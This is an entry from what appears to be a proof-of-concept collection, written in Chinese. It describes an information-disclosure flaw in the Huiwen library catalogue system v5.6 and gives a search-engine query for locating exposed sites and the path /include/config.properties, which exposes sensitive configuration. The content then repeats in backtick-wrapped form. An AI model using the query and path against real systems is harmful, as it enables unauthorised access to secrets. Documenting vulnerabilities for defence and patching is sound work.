Awesome-POC/Web应用漏洞/汇文图书馆书目检索系统 config.properties 信息泄漏漏洞.md

# 汇文 图书馆书目检索系统 config.properties 信息泄漏漏洞

## 漏洞描述

汇文 图书馆书目检索系统 /include/config.properties 文件中包含敏感信息，攻击者可以直接访问获取信息

## 漏洞影响

```
汇文v5.6
```

## 网络测绘

```
app="汇文软件-书目检索系统"
```

## 漏洞复现

主页面

![image-20220525144642895](images/202205251446991.png)

验证POC

```
/include/config.properties
```

![image-20220525144530183](images/202205251445229.png)
update 2024-11-06 14:10:36 +08:00			`# 汇文图书馆书目检索系统 config.properties 信息泄漏漏洞`

			`## 漏洞描述`

			`汇文图书馆书目检索系统 /include/config.properties 文件中包含敏感信息，攻击者可以直接访问获取信息`

			`## 漏洞影响`

			```
			`汇文v5.6`
			```

			`## 网络测绘`

			```
			`app="汇文软件-书目检索系统"`
			```

			`## 漏洞复现`

			`主页面`

			`![image-20220525144642895](images/202205251446991.png)`

			`验证POC`

			```
			`/include/config.properties`
			```

			`![image-20220525144530183](images/202205251445229.png)`